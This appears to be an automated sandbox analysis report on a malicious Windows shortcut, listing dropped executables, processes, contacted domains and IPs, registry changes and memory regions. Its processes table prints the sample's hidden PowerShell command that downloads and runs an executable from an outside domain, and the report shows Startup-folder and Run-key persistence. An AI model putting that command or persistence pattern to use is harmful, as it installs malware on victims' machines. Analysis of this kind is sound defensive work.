Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
RTGS-WB-ABS-240730-NEW.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon
number=0, Archive, ctime=Sun Nov 17 02:57:57 2019, mtime=Sun Nov 17 02:57:57 2019, atime=Wed Oct 29 01:16:41 2014, length=478720,
window=hide
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\file.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\unspattered\recomplaint.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aWUFv.exe.log
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03z3klie.fhq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duy0shnp.1z5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\flexuoseness
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\746c438e21160650.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G43DTOBPZAS7WZLARAO3.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
modified
|
||
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe
-OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
|
||
C:\Users\user\AppData\Local\Temp\file.exe
|
"C:\Users\user\AppData\Local\Temp\file.exe"
|
||
C:\Users\user\AppData\Local\unspattered\recomplaint.exe
|
"C:\Users\user\AppData\Local\Temp\file.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Users\user\AppData\Local\Temp\file.exe"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs"
|
||
C:\Users\user\AppData\Local\unspattered\recomplaint.exe
|
"C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
|
||
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
|
"C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
|
||
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
|
"C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 2 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://oootorgline.ru
|
unknown
|
||
https://oootorgline.ru/components/grace.exe
|
176.99.3.36
|
||
https://api.ipify.org/
|
172.67.74.152
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://api.ipify.org
|
unknown
|
||
http://crl.m
|
unknown
|
||
https://account.dyn.com/
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://www.microsoft.co
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://ip-api.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://oootorgline.ru
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://api.ipify.org/t
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://techniqueqatar.com
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 13 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
techniqueqatar.com
|
208.91.198.176
|
||
oootorgline.ru
|
176.99.3.36
|
||
ip-api.com
|
208.95.112.1
|
||
171.39.242.20.in-addr.arpa
|
unknown
|
||
api.ipify.org
|
172.67.74.152
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
208.91.198.176
|
techniqueqatar.com
|
United States
|
||
208.95.112.1
|
ip-api.com
|
United States
|
||
176.99.3.36
|
oootorgline.ru
|
Russian Federation
|
||
104.26.13.205
|
unknown
|
United States
|
||
172.67.74.152
|
api.ipify.org
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
aWUFv
|
There are 20 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2944000
|
trusted library allocation
|
page read and write
|
||
2989000
|
trusted library allocation
|
page read and write
|
||
402000
|
system
|
page execute and read and write
|
||
3414000
|
trusted library allocation
|
page read and write
|
||
3446000
|
trusted library allocation
|
page read and write
|
||
343E000
|
trusted library allocation
|
page read and write
|
||
4AB000
|
unkown
|
page readonly
|
||
482000
|
unkown
|
page readonly
|
||
6E4E000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4B3000
|
unkown
|
page readonly
|
||
410C000
|
heap
|
page read and write
|
||
586E000
|
stack
|
page read and write
|
||
432A000
|
heap
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
3D5B000
|
heap
|
page read and write
|
||
432F000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
432D000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
5CB3000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
E23000
|
heap
|
page read and write
|
||
401C000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
BAE000
|
stack
|
page read and write
|
||
45AF000
|
heap
|
page read and write
|
||
6E60000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
BF0000
|
trusted library allocation
|
page read and write
|
||
45A5000
|
heap
|
page read and write
|
||
26B0000
|
heap
|
page execute and read and write
|
||
2213F900000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
2213F7D4000
|
heap
|
page read and write
|
||
500000
|
unkown
|
page readonly
|
||
14D0000
|
heap
|
page read and write
|
||
635F000
|
stack
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
221291B2000
|
trusted library allocation
|
page read and write
|
||
61EE000
|
stack
|
page read and write
|
||
3D56000
|
heap
|
page read and write
|
||
58E4000
|
heap
|
page read and write
|
||
27D0000
|
heap
|
page execute and read and write
|
||
409A000
|
heap
|
page read and write
|
||
DCE000
|
stack
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
60AE000
|
stack
|
page read and write
|
||
900000
|
heap
|
page read and write
|
||
27FC000
|
stack
|
page read and write
|
||
3176000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
4094000
|
heap
|
page read and write
|
||
3FFC000
|
heap
|
page read and write
|
||
3195000
|
heap
|
page read and write
|
||
939000
|
stack
|
page read and write
|
||
3D58000
|
heap
|
page read and write
|
||
344F000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
77B55BE000
|
stack
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
4D4E000
|
trusted library allocation
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
2FF2000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
625E000
|
stack
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
4D20000
|
trusted library allocation
|
page read and write
|
||
3D53000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
C0D000
|
trusted library allocation
|
page execute and read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
16B1000
|
heap
|
page read and write
|
||
4084000
|
heap
|
page read and write
|
||
4531000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
22125880000
|
heap
|
page read and write
|
||
221376BD000
|
trusted library allocation
|
page read and write
|
||
4534000
|
heap
|
page read and write
|
||
68CE000
|
stack
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
6ACE000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
7FFD3465D000
|
trusted library allocation
|
page execute and read and write
|
||
6A8E000
|
stack
|
page read and write
|
||
A90000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4536000
|
heap
|
page read and write
|
||
34D8000
|
trusted library allocation
|
page read and write
|
||
34E2000
|
trusted library allocation
|
page read and write
|
||
31D0000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
45AA000
|
heap
|
page read and write
|
||
319A000
|
heap
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page execute and read and write
|
||
65F8000
|
heap
|
page read and write
|
||
4AB000
|
unkown
|
page readonly
|
||
14B7000
|
trusted library allocation
|
page execute and read and write
|
||
409A000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
4653000
|
direct allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
30E8000
|
heap
|
page read and write
|
||
77B61CE000
|
stack
|
page read and write
|
||
DF0000
|
heap
|
page read and write
|
||
4FBE000
|
stack
|
page read and write
|
||
E7F000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4533000
|
heap
|
page read and write
|
||
1390000
|
trusted library allocation
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
6C30000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
45A0000
|
heap
|
page read and write
|
||
5DEE000
|
stack
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
C40000
|
heap
|
page read and write
|
||
337E000
|
stack
|
page read and write
|
||
2A15000
|
trusted library allocation
|
page read and write
|
||
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
2213F791000
|
heap
|
page read and write
|
||
3150000
|
trusted library allocation
|
page read and write
|
||
58DD000
|
trusted library allocation
|
page read and write
|
||
45AB000
|
heap
|
page read and write
|
||
45A2000
|
heap
|
page read and write
|
||
2213FAD9000
|
heap
|
page read and write
|
||
1384000
|
trusted library allocation
|
page read and write
|
||
3D54000
|
heap
|
page read and write
|
||
3D5E000
|
heap
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
34CB000
|
trusted library allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
432C000
|
heap
|
page read and write
|
||
508E000
|
stack
|
page read and write
|
||
4327000
|
heap
|
page read and write
|
||
34E8000
|
trusted library allocation
|
page read and write
|
||
1680000
|
trusted library allocation
|
page read and write
|
||
49ED000
|
stack
|
page read and write
|
||
3F1C000
|
heap
|
page read and write
|
||
4530000
|
heap
|
page read and write
|
||
3D3F000
|
heap
|
page read and write
|
||
6570000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
4322000
|
heap
|
page read and write
|
||
1475000
|
heap
|
page read and write
|
||
4321000
|
heap
|
page read and write
|
||
1690000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page execute and read and write
|
||
410C000
|
heap
|
page read and write
|
||
33F1000
|
trusted library allocation
|
page read and write
|
||
3FBD000
|
heap
|
page read and write
|
||
3FFC000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
F90000
|
trusted library allocation
|
page read and write
|
||
432C000
|
heap
|
page read and write
|
||
486E000
|
direct allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
3192000
|
heap
|
page read and write
|
||
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
7FFD3480A000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
486E000
|
direct allocation
|
page read and write
|
||
22129278000
|
trusted library allocation
|
page read and write
|
||
77B53B7000
|
stack
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
7FBA0000
|
trusted library allocation
|
page execute and read and write
|
||
453B000
|
heap
|
page read and write
|
||
142E000
|
heap
|
page read and write
|
||
17DBF6B0000
|
heap
|
page read and write
|
||
3D56000
|
heap
|
page read and write
|
||
6C8E000
|
stack
|
page read and write
|
||
652E000
|
stack
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
3190000
|
heap
|
page read and write
|
||
453D000
|
heap
|
page read and write
|
||
4320000
|
heap
|
page read and write
|
||
53DD000
|
stack
|
page read and write
|
||
51CF000
|
stack
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
221255D0000
|
heap
|
page read and write
|
||
56F0000
|
heap
|
page read and write
|
||
6C4E000
|
stack
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
453B000
|
heap
|
page read and write
|
||
410D000
|
heap
|
page read and write
|
||
453C000
|
heap
|
page read and write
|
||
221256D7000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
45AC000
|
heap
|
page read and write
|
||
409B000
|
heap
|
page read and write
|
||
3D59000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
65C0000
|
trusted library allocation
|
page read and write
|
||
3D50000
|
heap
|
page read and write
|
||
432A000
|
heap
|
page read and write
|
||
5FAD000
|
stack
|
page read and write
|
||
4532000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
2212574E000
|
heap
|
page read and write
|
||
3909000
|
trusted library allocation
|
page read and write
|
||
4FC0000
|
heap
|
page execute and read and write
|
||
409A000
|
heap
|
page read and write
|
||
C14000
|
heap
|
page read and write
|
||
4E90000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
42D94FE000
|
stack
|
page read and write
|
||
17DBF9E5000
|
heap
|
page read and write
|
||
221258B0000
|
heap
|
page read and write
|
||
22137651000
|
trusted library allocation
|
page read and write
|
||
47FD000
|
direct allocation
|
page read and write
|
||
4323000
|
heap
|
page read and write
|
||
6210000
|
heap
|
page read and write
|
||
4535000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
34F4000
|
trusted library allocation
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
5E90000
|
trusted library allocation
|
page read and write
|
||
A20000
|
heap
|
page read and write
|
||
4323000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
138D000
|
trusted library allocation
|
page execute and read and write
|
||
719000
|
stack
|
page read and write
|
||
4536000
|
heap
|
page read and write
|
||
C45000
|
heap
|
page read and write
|
||
453A000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
31E8000
|
trusted library allocation
|
page read and write
|
||
2213FB07000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
31A0000
|
trusted library allocation
|
page read and write
|
||
77B608F000
|
stack
|
page read and write
|
||
EA0000
|
heap
|
page read and write
|
||
3D52000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
22128ECD000
|
trusted library allocation
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
43B1000
|
trusted library allocation
|
page read and write
|
||
14AA000
|
trusted library allocation
|
page execute and read and write
|
||
453A000
|
heap
|
page read and write
|
||
4D30000
|
trusted library allocation
|
page read and write
|
||
3192000
|
heap
|
page read and write
|
||
5C6E000
|
stack
|
page read and write
|
||
45A7000
|
heap
|
page read and write
|
||
3198000
|
heap
|
page read and write
|
||
3943000
|
trusted library allocation
|
page read and write
|
||
28E1000
|
trusted library allocation
|
page read and write
|
||
58E0000
|
heap
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
319D000
|
heap
|
page read and write
|
||
2212570E000
|
heap
|
page read and write
|
||
453A000
|
heap
|
page read and write
|
||
2213F920000
|
heap
|
page read and write
|
||
A70000
|
heap
|
page read and write
|
||
63EF000
|
stack
|
page read and write
|
||
4D74000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
5BF3000
|
heap
|
page read and write
|
||
66C0000
|
trusted library allocation
|
page read and write
|
||
77B5279000
|
stack
|
page read and write
|
||
4653000
|
direct allocation
|
page read and write
|
||
C1A000
|
trusted library allocation
|
page execute and read and write
|
||
410C000
|
heap
|
page read and write
|
||
C48000
|
heap
|
page read and write
|
||
2212927C000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
284F000
|
stack
|
page read and write
|
||
1370000
|
trusted library allocation
|
page read and write
|
||
F3A000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
63AD000
|
stack
|
page read and write
|
||
FEE000
|
stack
|
page read and write
|
||
47F9000
|
direct allocation
|
page read and write
|
||
47FD000
|
direct allocation
|
page read and write
|
||
4322000
|
heap
|
page read and write
|
||
3D5C000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
453F000
|
heap
|
page read and write
|
||
3196000
|
heap
|
page read and write
|
||
45A6000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
319E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3D57000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
22127630000
|
heap
|
page execute and read and write
|
||
66B8000
|
trusted library allocation
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
26AE000
|
stack
|
page read and write
|
||
77B4E7E000
|
stack
|
page read and write
|
||
3194000
|
heap
|
page read and write
|
||
77B4BF6000
|
stack
|
page read and write
|
||
319C000
|
heap
|
page read and write
|
||
D2E000
|
stack
|
page read and write
|
||
6DCE000
|
stack
|
page read and write
|
||
3D5B000
|
heap
|
page read and write
|
||
4530000
|
direct allocation
|
page read and write
|
||
ADE000
|
stack
|
page read and write
|
||
221291AA000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
698E000
|
stack
|
page read and write
|
||
6620000
|
trusted library allocation
|
page read and write
|
||
3D54000
|
heap
|
page read and write
|
||
45A3000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
4653000
|
direct allocation
|
page read and write
|
||
2A33000
|
trusted library allocation
|
page read and write
|
||
2213F7D2000
|
heap
|
page read and write
|
||
315E000
|
trusted library allocation
|
page read and write
|
||
E53000
|
trusted library allocation
|
page execute and read and write
|
||
22125660000
|
heap
|
page read and write
|
||
29A4000
|
trusted library allocation
|
page read and write
|
||
BE0000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
45A3000
|
heap
|
page read and write
|
||
77B553F000
|
stack
|
page read and write
|
||
221258E5000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
276E000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
E2E000
|
stack
|
page read and write
|
||
ECF000
|
heap
|
page read and write
|
||
4324000
|
heap
|
page read and write
|
||
2931000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
221274E0000
|
trusted library allocation
|
page read and write
|
||
49DE000
|
stack
|
page read and write
|
||
4323000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3196000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3198000
|
heap
|
page read and write
|
||
45AC000
|
heap
|
page read and write
|
||
45A0000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
B4E000
|
heap
|
page read and write
|
||
5CD2000
|
heap
|
page read and write
|
||
4E4E000
|
stack
|
page read and write
|
||
313E000
|
stack
|
page read and write
|
||
E50000
|
trusted library allocation
|
page execute and read and write
|
||
3D55000
|
heap
|
page read and write
|
||
15FE000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
15B0000
|
trusted library allocation
|
page read and write
|
||
EAE000
|
stack
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
C2B000
|
trusted library allocation
|
page execute and read and write
|
||
317B000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
4538000
|
heap
|
page read and write
|
||
AD1000
|
heap
|
page read and write
|
||
13D8000
|
heap
|
page read and write
|
||
189E000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4DBE000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
22127520000
|
heap
|
page readonly
|
||
406D000
|
heap
|
page read and write
|
||
486E000
|
direct allocation
|
page read and write
|
||
4536000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4EB0000
|
heap
|
page read and write
|
||
30C0000
|
direct allocation
|
page read and write
|
||
46D0000
|
direct allocation
|
page read and write
|
||
343C000
|
trusted library allocation
|
page read and write
|
||
6690000
|
heap
|
page read and write
|
||
3FFC000
|
heap
|
page read and write
|
||
401C000
|
heap
|
page read and write
|
||
1640000
|
heap
|
page read and write
|
||
22128C5C000
|
trusted library allocation
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
3CA4000
|
heap
|
page read and write
|
||
66F0000
|
trusted library allocation
|
page read and write
|
||
4F8E000
|
stack
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
6F10000
|
trusted library allocation
|
page read and write
|
||
510B000
|
stack
|
page read and write
|
||
22128C4A000
|
trusted library allocation
|
page read and write
|
||
4D30000
|
trusted library allocation
|
page read and write
|
||
660A000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
77B52BE000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4084000
|
heap
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
432F000
|
heap
|
page read and write
|
||
3194000
|
heap
|
page read and write
|
||
453F000
|
heap
|
page read and write
|
||
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
299B000
|
trusted library allocation
|
page read and write
|
||
3D56000
|
heap
|
page read and write
|
||
E2B000
|
trusted library allocation
|
page execute and read and write
|
||
4653000
|
direct allocation
|
page read and write
|
||
17DBF860000
|
heap
|
page read and write
|
||
34DD000
|
trusted library allocation
|
page read and write
|
||
4DFE000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
45A0000
|
heap
|
page read and write
|
||
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
12F8000
|
stack
|
page read and write
|
||
7FFD34810000
|
trusted library allocation
|
page execute and read and write
|
||
410C000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
A65000
|
heap
|
page read and write
|
||
490000
|
unkown
|
page write copy
|
||
33E6000
|
trusted library allocation
|
page read and write
|
||
172E000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
7FAC0000
|
trusted library allocation
|
page execute and read and write
|
||
51BF000
|
stack
|
page read and write
|
||
22125668000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4534000
|
heap
|
page read and write
|
||
45AF000
|
heap
|
page read and write
|
||
4325000
|
heap
|
page read and write
|
||
2212574A000
|
heap
|
page read and write
|
||
C10000
|
trusted library allocation
|
page read and write
|
||
27E1000
|
trusted library allocation
|
page read and write
